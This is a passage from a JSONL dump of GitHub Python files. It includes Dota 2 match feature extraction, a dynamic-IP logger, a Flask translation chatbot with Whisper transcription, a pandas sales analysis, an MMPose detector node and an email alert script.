sum(chatwheel_count(m, i, t) for i in range(5)),\n sum(chatwheel_count(m, i, t) for i in range(5, 10))\n ])\n gold_total = torch.FloatTensor([\n sum(m['players'][i]['gold_t'][t] for i in range(5)),\n sum(m['players'][i]['gold_t'][t] for i in range(5, 10))\n ])\n ll.append(gold_total)\n xp_total = torch.FloatTensor([\n sum(m['players'][i]['xp_t'][t] for i in range(5)),\n sum(m['players'][i]['xp_t'][t] for i in range(5, 10))\n ])\n ll.append(xp_total)\n lh_total = torch.FloatTensor([lh[:5].sum(), lh[5:].sum()])\n ll.append(lh_total)\n dn_total = torch.FloatTensor([dn[:5].sum(), dn[5:].sum()])\n ll.append(dn_total)\n rune5_total = torch.FloatTensor([rune5[:5].sum(), rune5[5:].sum()])\n ll.append(rune5_total)\n gold_delta1_total = torch.FloatTensor([\n sum(m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in range(5)),\n sum(m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in range(5, 10))\n ])\n ll.append(gold_delta1_total)\n gold_delta5_total = torch.FloatTensor([\n sum(m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in range(5)),\n sum(m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in range(5, 10))\n ])\n ll.append(gold_delta5_total)\n xp_delta1_total = torch.FloatTensor([\n sum(m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(5)),\n sum(m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(5, 10))\n ])\n ll.append(xp_delta1_total)\n xp_delta5_total = torch.FloatTensor([\n sum(m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(5)),\n sum(m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(5, 10))\n ])\n ll.append(xp_delta5_total)\n ll = ll + [torch.log1p(t) for t in ll]\n\n building = building_states_array(m, t)\n ll.append(building)\n ll.append(chatwheel_total)\n pred_vict = torch.FloatTensor([\n sum(m['players'][i]['pred_vict'] for i in range(5)),\n sum(m['players'][i]['pred_vict'] for i in range(5, 10))\n ])\n ll.append(pred_vict)\n gold_variation = torch.FloatTensor([\n stats.variation([m['players'][i]['gold_t'][t] + 1 for i in range(5)]),\n stats.variation([m['players'][i]['gold_t'][t] + 1 for i in range(5, 10)])\n ])\n ll.append(gold_variation)\n xp_variation = torch.FloatTensor([\n stats.variation([m['players'][i]['xp_t'][t] + 1 for i in range(5)]),\n stats.variation([m['players'][i]['xp_t'][t] + 1 for i in range(5, 10)])\n ])\n ll.append(xp_variation)\n region = torch.zeros(25, dtype=torch.float)\n region[m['region'] - 1] = 1.0\n ll.append(region)\n\n sg.append(torch.cat(ll))\n\n for i in range(5):\n for j in m['players'][i]['kills_log']:\n for k in range(5, 10):\n if m['players'][k]['hero_id'] == hero2id[j['key']]:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[[i, k]] = 1\n e.append((0, j['time'], mask))\n break\n for i in range(5, 10):\n for j in m['players'][i]['kills_log']:\n for k in range(5):\n if m['players'][k]['hero_id'] == hero2id[j['key']]:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[[i, k]] = 1\n e.append((1, j['time'], mask))\n break\n for i in range(5):\n for j in m['players'][i]['buyback_log']:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i] = 1\n e.append((2, j['time'], mask))\n for i in range(5, 10):\n for j in m['players'][i]['buyback_log']:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i] = 1\n e.append((3, j['time'], mask))\n for i in range(5):\n for j in m['players'][i]['runes_log']:\n if j['key'] != 5:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i] = 1\n e.append((4 + j['key'], j['time'], mask))\n for i in range(5, 10):\n for j in m['players'][i]['runes_log']:\n if j['key'] != 5:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i] = 1\n e.append((11 + j['key'], j['time'], mask))\n for i in m['objectives']:\n if i['type'] == 'CHAT_MESSAGE_FIRSTBLOOD':\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i['slot']] = 1\n e.append((18 if i['slot'] < 5 else 19, i['time'], mask))\n elif i['type'] == 'CHAT_MESSAGE_ROSHAN_KILL':\n mask = torch.zeros(10, dtype=torch.uint8)\n if i['team'] == 2:\n mask[[0, 1, 2, 3, 4]] = 1\n e.append((20, i['time'], mask))\n elif i['team'] == 3:\n mask[[5, 6, 7, 8, 9]] = 1\n e.append((21, i['time'], mask))\n else:\n raise Exception('unknown team')\n elif i['type'] == 'CHAT_MESSAGE_AEGIS':\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i['slot']] = 1\n e.append((22 if i['slot'] < 5 else 23, i['time'], mask))\n elif i['type'] == 'building_kill':\n mask = torch.ones(10, dtype=torch.uint8)\n bid = building_id(i['key'])\n if bid != -1:\n e.append((24 + bid, i['time'], mask))\n e.append((58, -90, torch.ones(10, dtype=torch.uint8)))\n e = sorted(e, key=lambda x: x[1])\n\n return si, hero, sg, e, 1 - int(m['radiant_win']), m['duration']\n\n @staticmethod\n def transform_train(m):\n si, hero, sg, e, y, dur = DotaData.extract_match(m)\n si = si[:128]\n sg = sg[:128]\n e = [ev for ev in e if ev[1] <= len(si) * 60]\n e, e_t, e_mask = zip(*e)\n e = torch.LongTensor(e)\n e_t = torch.LongTensor(e_t)\n e_t.clamp_(max=len(si) * 60 - 1)\n e_mask = torch.stack(e_mask)\n return torch.stack(si), hero, torch.stack(sg), len(si), e, e_t, e_mask, e.size(0), y, dur\n\n @staticmethod\n def transform_valid(m):\n si, hero, sg, e, y, dur = DotaData.extract_match(m)\n e, e_t, e_mask = zip(*e)\n e = torch.LongTensor(e)\n e_t = torch.LongTensor(e_t)\n e_t.clamp_(max=len(si) * 60 - 1)\n e_mask = torch.stack(e_mask)\n return torch.stack(si), hero, torch.stack(sg), len(si), e, e_t, e_mask, e.size(0), y, dur\n\n @staticmethod\n def transform_test(m):\n si, hero, sg, e, y, dur = DotaData.extract_match(m)\n e, e_t, e_mask = zip(*e)\n e = torch.LongTensor(e)\n e_t = torch.LongTensor(e_t)\n e_t.clamp_(max=len(si) * 60 - 1)\n e_mask = torch.stack(e_mask)\n return torch.stack(si), hero, torch.stack(sg), len(si), e, e_t, e_mask, e.size(0), y, dur, m['match_id']\n\n @staticmethod\n def collate_fn(batch):\n batch = sorted(batch, key=lambda item: item[3], reverse=True)\n si_b, hero_b, sg_b, x_len_b, e_b, e_t_b, e_mask_b, e_len_b, y_b, z_b = zip(*batch)\n si = pad_sequence(si_b, batch_first=True) # Float[bs, max_t, 10, d_si]\n hero = torch.stack(hero_b) # Long[bs, 10]\n sg = pad_sequence(sg_b, batch_first=True) # Float[bs, max_t, d_sg]\n x_len = torch.LongTensor(x_len_b) # Long[bs]\n e = pad_sequence(e_b, batch_first=True) # Float[bs, max_e]\n e_t = pad_sequence(e_t_b, batch_first=True) # Float[bs, max_e]\n e_mask = pad_sequence(e_mask_b, batch_first=True) # Float[bs, max_e, 10]\n e_len = torch.LongTensor(e_len_b)\n y = torch.LongTensor(y_b) # Long[bs]\n z = torch.FloatTensor(z_b) # Float[bs]\n return si, hero, sg, x_len, e, e_t, e_mask, e_len, y, z\n\n @staticmethod\n def collate_fn_with_id(batch):\n batch = sorted(batch, key=lambda item: item[3], reverse=True)\n si_b, hero_b, sg_b, x_len_b, e_b, e_t_b, e_mask_b, e_len_b, y_b, z_b, m_id_b = zip(*batch)\n si = pad_sequence(si_b, batch_first=True) # Float[bs, max_t, 10, d_si]\n hero = torch.stack(hero_b) # Long[bs, 10]\n sg = pad_sequence(sg_b, batch_first=True) # Float[bs, max_t, d_sg]\n x_len = torch.LongTensor(x_len_b) # Long[bs]\n e = pad_sequence(e_b, batch_first=True) # Float[bs, max_e]\n e_t = pad_sequence(e_t_b, batch_first=True) # Float[bs, max_e]\n e_mask = pad_sequence(e_mask_b, batch_first=True) # Float[bs, max_e, 10]\n e_len = torch.LongTensor(e_len_b)\n y = torch.LongTensor(y_b) # Long[bs]\n z = torch.FloatTensor(z_b) # Float[bs]\n m_id = torch.LongTensor(m_id_b)\n return si, hero, sg, x_len, e, e_t, e_mask, e_len, y, z, m_id\n","repo_name":"jvvvmh/Quantitative-Competitions","sub_path":"Winning Probability of Dota2 - Real-time Prediction/code/dota_data.py","file_name":"dota_data.py","file_ext":"py","file_size_in_byte":45051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2084283527","text":"# create to get Dynamic IP\n#add time + ip written in txt\nimport socket\nimport os\nfrom time import sleep,ctime,strftime\nimport time\n\nclass GetIp(object):\n\n \n \n global TIME\n# global path\n# path = '/Users/ahaic/Desktop/ip_log.txt'\n\n def __init__(self,url,path):\n\n self.url=url\n self.ip=''\n self.path = path\n \n self.record_ip()\n\n \n\n def get_ip(self):\n global IP\n\n try:\n\n IP=str(socket.gethostbyname_ex(self.url)[2][0])\n \n print(IP)\n \n except socket.error as e:\n\n print('socket error: %s ' % e)\n sleep(100)\n self.get_ip()\n\n def record_ip(self):\n while True:\n self.get_ip()\n \n \n if os.path.isfile(self.path) !=True:\n\n print('file does not exists ')\n \n try:\n ip_log = open(self.path,'w')\n\n except IOError:\n print('IO Error ')\n exit()\n \n \n else:\n try:\n \n ip_log=open(self.path,'a')\n except:\n print(' open file failed in a mode')\n else:\n print('file open successfully')\n \n try:\n self.output()\n ip_log.write('%s \\n %s ' % (self.row1,self.row2))\n ip_log.write('\\n')\n ip_log.close()\n \n \n except Exception as e: # catch all exception\n print('written failed :', e)\n print('stop running')\n break\n else:\n print('written \\n waiting for next writting')\n \n\n sleep(3600)\n \n def set_time(self):\n\n pass\n \n \n \n def output(self):\n\n li = 18 -len(IP)\n ip=\" \"+IP+(li*\" \")\n\n time = strftime('%d-%m-%Y')+ \" \" +strftime('%H:%M:%S')\n lt = 18-len(time)\n time=\" \"+time+(lt*\" \")\n \n self.row1 =(22*'-')+'+'+(22*'-')\n \n self.row2='|'+ip+'|'+time+'|'\n\n # return self.row1\n \n\n\n\n \n \n\n \nobj = GetIp('paksila.xicp.net','/home/ip_log.txt')\n\n#obj = GetIp('paksila.xicp.net','/Users/ahaic/Desktop/ip_log.txt')\n\nprint('ip address: ', IP)\n \n \n \n","repo_name":"ahaic/project","sub_path":"get_ip.py","file_name":"get_ip.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38934144364","text":"from flask import Flask, render_template, request,jsonify\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nimport numpy as np\nimport tflearn\nimport tensorflow as tf\nimport random\nimport yaml\nimport requests\nimport libretranslatepy\n#transcription\nimport whisper\nimport sounddevice as sd\nimport soundfile as sf\nimport subprocess\n\napp = Flask(__name__)\n\nwith open(\"intents.yaml\") as file:\n data = yaml.safe_load(file)\n\nlemmatizer = WordNetLemmatizer()\n\nwords = []\nlabels = []\ndocs_x = []\ndocs_y = []\n\n# Tokenize and lemmatize words in patterns\nfor intent in data[\"intents\"]:\n for pattern in intent[\"patterns\"]:\n tokens = nltk.word_tokenize(pattern)\n words.extend(tokens)\n docs_x.append([lemmatizer.lemmatize(word) for word in tokens])\n docs_y.append(intent[\"tag\"])\n\n if intent[\"tag\"] not in labels:\n labels.append(intent[\"tag\"])\n\n# Sort and remove duplicates\nwords = sorted(set(words))\nlabels = sorted(set(labels))\n\n# Build a Bag of Words for each pattern\ntraining = []\noutput = []\n\nout_empty = [0] * len(labels)\n\nfor x, doc in enumerate(docs_x):\n bag = []\n wrds = [lemmatizer.lemmatize(word.lower()) for word in doc]\n\n for word in words:\n if word in wrds:\n bag.append(1)\n else:\n bag.append(0)\n\n output_row = out_empty[:]\n output_row[labels.index(docs_y[x])] = 1\n\n training.append(bag)\n output.append(output_row)\n# Convert to numpy array\ntraining = np.array(training)\noutput = np.array(output)\n# Build the neural network\ntf.compat.v1.reset_default_graph()\nnet = tflearn.input_data(shape=[None, len(training[0])])\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, len(output[0]), activation=\"softmax\")\nnet = tflearn.regression(net)\nmodel = tflearn.DNN(net)\n# Train the model\nmodel.fit(training, output, n_epoch=1000, batch_size=8, show_metric=True)\nmodel.save(\"model.tflearn\")\n# Load the model\nmodel.load(\"model.tflearn\")\ntry:\n cmd = ['libretranslate']\n subprocess.Popen(cmd)\nexcept print(0):\n pass\n\n\n@app.route(\"/home\")\ndef home():\n return render_template(\"home.html\")\n# Respond to user input\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n\n@app.route(\"/record\", methods=[\"POST\"])\ndef record():\n model = whisper.load_model(\"tiny.en\") # Load English model\n audio_file = \"recorded_audio.wav\" # File to save recorded audio\n seconds = 5 # Recording duration in seconds\n\n # Record audio from user\n fs = 16000 # Sample rate\n print(\"Recording...\")\n myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=1)\n sd.wait() # Wait until recording is finished\n sf.write(audio_file, myrecording, fs) # Save as WAV file\n\n # Transcribe audio using Whisper\n result = model.transcribe(audio_file)\n transcription = result[\"text\"]\n print(\"Transcription:\", transcription)\n\n # Send transcription to /get endpoint\n response = requests.get(\"http://localhost:5000/get\", params={\"msg\": transcription})\n \n return jsonify({\"transcription\": transcription})\n\n#botresponse\n@app.route(\"/get\")\ndef get_bot_response():\n user_input = request.args.get(\"msg\")\n # detect language and translate to English\n response = requests.post(\"http://localhost:5000/detect\", json={\"q\": user_input}).json()\n lang = response[0][\"language\"]\n if lang != \"en\":\n response = requests.post(\"http://localhost:5000/translate\", json={\"q\": user_input, \"source\": lang, \"target\": \"en\"}).json()\n user_input = response[\"translatedText\"]\n # get model response\n results = model.predict([BagOfWords(user_input, words, lemmatizer)])\n results_index = np.argmax(results)\n tag = labels[results_index]\n for intent in data[\"intents\"]:\n if intent[\"tag\"] == tag:\n responses = intent[\"responses\"]\n break\n response = random.choice(responses)\n # translate model response back to the original language\n if lang != \"en\":\n response = requests.post(\"http://localhost:5000/translate\", json={\"q\": response, \"source\": \"en\", \"target\": lang}).json()[\"translatedText\"]\n return response\ndef BagOfWords(s, words, lemmatizer):\n bag = [0] * len(words)\n s_words = nltk.word_tokenize(s)\n s_words = [lemmatizer.lemmatize(word.lower()) for word in s_words]\n\n for se in s_words:\n for i, word in enumerate(words):\n if word == se:\n bag[i] = 1\n return np.array(bag)\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port='8080')\n","repo_name":"danpizzy/tensewhisper","sub_path":"librewhisper.py","file_name":"librewhisper.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"2723451675","text":"from pylab import *\r\nimport random\r\n\r\n#plot([1, 2, 3, 4])\r\n#plot([5, 6, 7, 8])\r\n#plot([1, 2, 3, 4], [1, 4, 9, 16])\r\n#\r\n#figure()\r\n#plot([1, 2, 3, 4], [1, 4, 9, 16], 'ro')\r\n#axis([0, 6, 0, 20])\r\n#title('Erarings')\r\n#xlabel('Days')\r\n#ylabel('Dollars')\r\n\r\n#figure()\r\n#xAxis = array([1, 2, 3, 4])\r\n#print xAxis\r\n#test = arange(1, 5)\r\n#print test\r\n#print test == xAxis\r\n#yAxis = xAxis**3\r\n#plot(xAxis, yAxis, 'ro')\r\n\r\nfigure()\r\nvals = []\r\ndiaVals = [1, 2, 3, 4, 5, 6]\r\nfor i in range(10000):\r\n vals.append(random.choice(diaVals) + random.choice(diaVals))\r\nhist(vals, normed = 11)\r\nshow()\r\n","repo_name":"sunzhy3/exercise","sub_path":"mit6.00/plotTest.py","file_name":"plotTest.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40487613859","text":"from itertools import zip_longest\nfrom typing import Dict, List, Optional, Union\n\nimport numpy as np\n\nfrom ...utils import get_config_path\nfrom ..node import Node\nfrom ..registry import NODES\n\ntry:\n from mmdet.apis import inference_detector, init_detector\n has_mmdet = True\nexcept (ImportError, ModuleNotFoundError):\n has_mmdet = False\n\n\n@NODES.register_module()\nclass DetectorNode(Node):\n \"\"\"Detect objects from the frame image using MMDetection model.\n\n Note that MMDetection is required for this node. Please refer to\n `MMDetection documentation `_ for the installation guide.\n\n Parameters:\n name (str): The node name (also thread name)\n model_cfg (str): The model config file\n model_checkpoint (str): The model checkpoint file\n input_buffer (str): The name of the input buffer\n output_buffer (str|list): The name(s) of the output buffer(s)\n enable_key (str|int, optional): Set a hot-key to toggle enable/disable\n of the node. If an int value is given, it will be treated as an\n ascii code of a key. Please note: (1) If ``enable_key`` is set,\n the ``bypass()`` method need to be overridden to define the node\n behavior when disabled; (2) Some hot-keys are reserved for\n particular use. For example: 'q', 'Q' and 27 are used for exiting.\n Default: ``None``\n enable (bool): Default enable/disable status. Default: ``True``\n device (str): Specify the device to hold model weights and inference\n the model. Default: ``'cuda:0'``\n bbox_thr (float): Set a threshold to filter out objects with low bbox\n scores. Default: 0.5\n multi_input (bool): Whether load all frames in input buffer. If True,\n all frames in buffer will be loaded and stacked. The latest frame\n is used to detect objects of interest. Default: False\n\n Example::\n >>> cfg = dict(\n ... type='DetectorNode',\n ... name='detector',\n ... model_config='demo/mmdetection_cfg/'\n ... 'ssdlite_mobilenetv2_scratch_600e_coco.py',\n ... model_checkpoint='https://download.openmmlab.com'\n ... '/mmdetection/v2.0/ssd/'\n ... 'ssdlite_mobilenetv2_scratch_600e_coco/ssdlite_mobilenetv2_'\n ... 'scratch_600e_coco_20210629_110627-974d9307.pth',\n ... # `_input_` is an executor-reserved buffer\n ... input_buffer='_input_',\n ... output_buffer='det_result')\n\n >>> from mmpose.apis.webcam.nodes import NODES\n >>> node = NODES.build(cfg)\n \"\"\"\n\n def __init__(self,\n name: str,\n model_config: str,\n model_checkpoint: str,\n input_buffer: str,\n output_buffer: Union[str, List[str]],\n enable_key: Optional[Union[str, int]] = None,\n enable: bool = True,\n device: str = 'cuda:0',\n bbox_thr: float = 0.5,\n multi_input: bool = False):\n # Check mmdetection is installed\n assert has_mmdet, \\\n f'MMDetection is required for {self.__class__.__name__}.'\n\n super().__init__(\n name=name,\n enable_key=enable_key,\n enable=enable,\n multi_input=multi_input)\n\n self.model_config = get_config_path(model_config, 'mmdet')\n self.model_checkpoint = model_checkpoint\n self.device = device.lower()\n self.bbox_thr = bbox_thr\n\n # Init model\n self.model = init_detector(\n self.model_config, self.model_checkpoint, device=self.device)\n\n # Register buffers\n self.register_input_buffer(input_buffer, 'input', trigger=True)\n self.register_output_buffer(output_buffer)\n\n def bypass(self, input_msgs):\n return input_msgs['input']\n\n def process(self, input_msgs):\n input_msg = input_msgs['input']\n\n if self.multi_input:\n imgs = [frame.get_image() for frame in input_msg]\n input_msg = input_msg[-1]\n\n img = input_msg.get_image()\n\n preds = inference_detector(self.model, img)\n objects = self._post_process(preds)\n input_msg.update_objects(objects)\n\n if self.multi_input:\n input_msg.set_image(np.stack(imgs, axis=0))\n\n return input_msg\n\n def _post_process(self, preds) -> List[Dict]:\n \"\"\"Post-process the predictions of MMDetection model.\"\"\"\n if isinstance(preds, tuple):\n dets = preds[0]\n segms = preds[1]\n else:\n dets = preds\n segms = [[]] * len(dets)\n\n classes = self.model.CLASSES\n if isinstance(classes, str):\n classes = (classes, )\n\n assert len(dets) == len(classes)\n assert len(segms) == len(classes)\n\n objects = []\n\n for i, (label, bboxes, masks) in enumerate(zip(classes, dets, segms)):\n\n for bbox, mask in zip_longest(bboxes, masks):\n if bbox[4] < self.bbox_thr:\n continue\n obj = {\n 'class_id': i,\n 'label': label,\n 'bbox': bbox,\n 'mask': mask,\n 'det_model_cfg': self.model.cfg\n }\n objects.append(obj)\n\n return objects\n","repo_name":"aim-uofa/Poseur","sub_path":"mmpose/apis/webcam/nodes/model_nodes/detector_node.py","file_name":"detector_node.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"61"} +{"seq_id":"74123668675","text":"from unittest.mock import call\n\nimport pytest\n\nfrom calcipy.tasks.executable_utils import python_dir\nfrom calcipy.tasks.types import mypy, pyright\n\n\n@pytest.mark.parametrize(\n ('task', 'kwargs', 'commands'),\n [\n (pyright, {}, [\n call('which pyright', warn=True, hide=True),\n 'pyright calcipy',\n ]),\n (mypy, {}, [f'{python_dir()}/mypy calcipy']),\n ],\n)\ndef test_types(ctx, task, kwargs, commands):\n task(ctx, **kwargs)\n\n ctx.run.assert_has_calls([\n call(cmd) if isinstance(cmd, str) else cmd\n for cmd in commands\n ])\n","repo_name":"KyleKing/calcipy","sub_path":"tests/tasks/test_types.py","file_name":"test_types.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"3535799523","text":"from wxbanker.lib.pubsub import Publisher\nfrom wxbanker import bankexceptions\n\n\nclass AccountList(list):\n def __init__(self, bankmodel, store):\n list.__init__(self, store.GetAccounts())\n # Make sure all the items know their parent list.\n for account in self:\n account.Parent = self\n\n self.BankModel = bankmodel\n self.Store = store\n self.sort()\n \n Publisher.subscribe(self.onAccountRenamed, \"ormobject.updated.Account.Name\")\n \n def GetRecurringTransactions(self):\n allRecurrings = []\n for account in self:\n recurrings = account.GetRecurringTransactions()\n if recurrings:\n allRecurrings.extend(recurrings)\n \n return allRecurrings\n\n def GetBalance(self):\n totalCurrency = self.BankModel.GlobalCurrency\n total = 0\n for account in self:\n total = total + account.GetBalance(totalCurrency)\n return total\n \n def GetById(self, theId):\n for account in self:\n if account.ID == theId:\n return account\n\n def AccountIndex(self, accountName):\n for i, account in enumerate(self):\n if account.Name == accountName:\n return i\n return -1\n\n def ThrowExceptionOnInvalidName(self, accountName):\n # First make sure we were given a name!\n if not accountName:\n raise bankexceptions.BlankAccountNameException\n # Now ensure an account by that name doesn't already exist.\n if self.AccountIndex(accountName) >= 0:\n raise bankexceptions.AccountAlreadyExistsException(accountName)\n\n def Create(self, accountName):\n self.ThrowExceptionOnInvalidName(accountName)\n\n currency = 0\n if len(self):\n # If the list contains items, the currency needs to be consistent.\n currency = self[-1].Currency\n\n account = self.Store.CreateAccount(accountName, currency)\n # Make sure this account knows its parent.\n account.Parent = self\n self.append(account)\n self.sort()\n Publisher.sendMessage(\"account.created.%s\" % accountName, account)\n return account\n\n def Remove(self, accountName):\n index = self.AccountIndex(accountName)\n if index == -1:\n raise bankexceptions.InvalidAccountException(accountName)\n\n account = self.pop(index)\n # Remove all the transactions associated with this account.\n account.Purge()\n \n Publisher.sendMessage(\"account.removed.%s\"%accountName, account)\n\n def __eq__(self, other):\n if len(self) != len(other):\n return False\n for leftAccount, rightAccount in zip(self, other):\n if not leftAccount == rightAccount:\n return False\n\n return True\n \n def onAccountRenamed(self, message):\n self.sort()\n\n Balance = property(GetBalance)\n\n","repo_name":"mrooney/wxbanker","sub_path":"wxbanker/bankobjects/accountlist.py","file_name":"accountlist.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"41786935095","text":"#\n# Check if there are any warnings, and send emails\n#\n\nimport os\nimport sys\n\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nimport boto\n\n\n# people who should receive this alerts\nSEND_TO = ()\n\n# alert thresholds\nMIN_TIME = 5 # in seconds\nMAX_TIME = 30*60 # in seconds\n\n\nCWD = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.join(CWD, '..'))\nfrom monitoring import (MONITORING_HOST, SIMMETRICA_CONFIG,\n return_average_for_last_days)\nfrom settings_ses import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY\n\n\ndef get_working_time_events():\n result = []\n with open(SIMMETRICA_CONFIG, 'r') as fh:\n for line in fh:\n if 'name:' not in line:\n continue\n if 'working_time' not in line:\n continue\n result.append(line.strip().rsplit(' ', 1)[1].strip())\n return result\n\n\ndef send_ses(fromaddr, subject, body, recipient, attachment=None,\n filename=''):\n \"\"\"Send an email via the Amazon SES service.\n\n Example:\n send_ses('me@example.com, 'greetings', \"Hi!\", 'you@example.com)\n\n Return:\n If 'ErrorResponse' appears in the return message from SES,\n return the message, otherwise return an empty '' string.\n \"\"\"\n msg = MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = fromaddr\n msg['To'] = recipient\n msg.attach(MIMEText(body))\n if attachment:\n part = MIMEApplication(attachment)\n part.add_header('Content-Disposition', 'attachment',\n filename=filename)\n msg.attach(part)\n conn = boto.connect_ses(aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n result = conn.send_raw_email(msg.as_string())\n return result if 'ErrorResponse' in result else ''\n\n\ndef send_email(warning_msg):\n subject = 'Ranking spiders alert'\n body = warning_msg\n for to in SEND_TO:\n send_ses(fromaddr='noreply@'+MONITORING_HOST, subject=subject,\n body=body, recipient=to.strip())\n\n\nif __name__ == '__main__':\n events = get_working_time_events()\n for event in events:\n avg_time = return_average_for_last_days(event)\n if avg_time is None:\n continue\n if avg_time < MIN_TIME:\n send_email(event + ' is less than '+str(MIN_TIME)+' seconds')\n if avg_time > MAX_TIME:\n send_email(event + ' is more than '+str(MAX_TIME)+' seconds')","repo_name":"aprosdev/ecom-predictor","sub_path":"product-ranking/monitoring/send_alerts.py","file_name":"send_alerts.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39011715892","text":"import pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport pandasql as ps\n\n#Read sample sales data from CSV\n\ndf = pd.read_csv('https://raw.githubusercontent.com/ine-rmotr-curriculum/FreeCodeCamp-Pandas-Real-Life-Example/master/data/sales_data.csv',\n header = [0],\n parse_dates=['Date'], \n skip_blank_lines=True)\n\n\n#Only select rows with a not null Revenue value\n\n\ndf = df[df['Revenue'].notna()]\n\n\n#Create list for salesperson id and add a random value for every record in the sales data. \n#Then transpose list to a column and add it to the dataframe \n\n\nSalesperson_id = []\n\nfor x in np.arange(df.shape[0]):\n Salesperson_id.append(random.randint(1,3))\n \ndf['Salesperson_id'] = Salesperson_id\n\n\n#Create dictionary for each salesperson_id and their corresponding name,\n#Convert the dictionary to a dataframe, then join it to the original dataframe using the Salesperson_nm as the key\n\n\nd = {'Salesperson_id': [1, 2, 3], \n 'Salesperson_nm' : ['Bradley','Steve','Kyle']}\ndf2 = pd.DataFrame(data=d)\ndf3 = pd.merge(df,df2,on='Salesperson_id')\n\n\n#Panda SQL query to find revenue per salesperson, then plot the data in a pie chart\n\n\n\ndf4 = ps.sqldf(\"select Salesperson_nm,SUM(Revenue) as Revenue from df3 group by Salesperson_nm\")\ndf4.set_index('Salesperson_nm')\n\n\nlabels = df4['Salesperson_nm']\nrevs = df4['Revenue']\n\n\npatches, texts = plt.pie(revs, startangle=90)\nplt.legend(patches, labels, loc=\"best\")\nplt.title(\"Revenue Distribution\")\nplt.axis('equal')\n\n\n#Panda SQL queries to find out revenue of each salesperson per day in the year 2013\n#Then merge the query results into 1 dataframe\n\n\ndf5 = ps.sqldf(\"select Date,SUM(Revenue) as Bradley_revenue from df3 where Salesperson_nm = 'Bradley' AND (Date > '2013-01-01') AND (Date < '2014-01-01') group by Date\")\ndf6 = ps.sqldf(\"select Date,SUM(Revenue) as Steve_revenue from df3 where Salesperson_nm = 'Steve' AND (Date > '2013-01-01') AND (Date < '2014-01-01') group by Date\")\ndf7 = ps.sqldf(\"select Date,SUM(Revenue) as Kyle_revenue from df3 where Salesperson_nm = 'Kyle' AND (Date > '2013-01-01') AND (Date < '2014-01-01') group by Date\")\n\n\nmerged1 = pd.merge(df5,df6,on=\"Date\")\nmerged2 = pd.merge(merged1,df7,on=\"Date\")\n\nmerged2['Date'] = pd.to_datetime(merged2['Date']).dt.date\nmerged2.set_index('Date')\n\n#merged2.head()\n\n#Divide outlier daily revenue values for Bradley by 3\n\nmerged2.loc[merged2['Bradley_revenue'] > 50000, 'Bradley_revenue'] = merged2.loc[merged2['Bradley_revenue'] > 50000, 'Bradley_revenue'] / 3\n\n\n#Plot Bradley's revenue in 2013\n\nmerged2.plot(x='Date', y='Bradley_revenue');\n","repo_name":"Kurt-Blair/Python-Sales-Analysis","sub_path":"Sales data analysis.py","file_name":"Sales data analysis.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42355923768","text":"import logging\nimport sys\nimport time\n\nfrom nftools.solana import get_rpc, update_rpc\nfrom nftools.utils import query_yes_no, run_command, string_between\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nCLUSTER = get_rpc()\n\n\ndef confirm_rpc(cluster):\n if cluster != get_rpc():\n query_yes_no(\n f'Cluster {cluster} does not equal default {CLUSTER}. Are you sure you want to update your RPC?',\n break_message='Update request denied.')\n update_rpc(cluster)\n\n logger.info(f'Using {cluster} as RPC URL.')\n\n\ndef create_token_mint():\n command = ['spl-token', 'create-token', '--decimals', '0']\n logger.info(f'Creating white list token.')\n process = run_command(command)\n print(process)\n token = 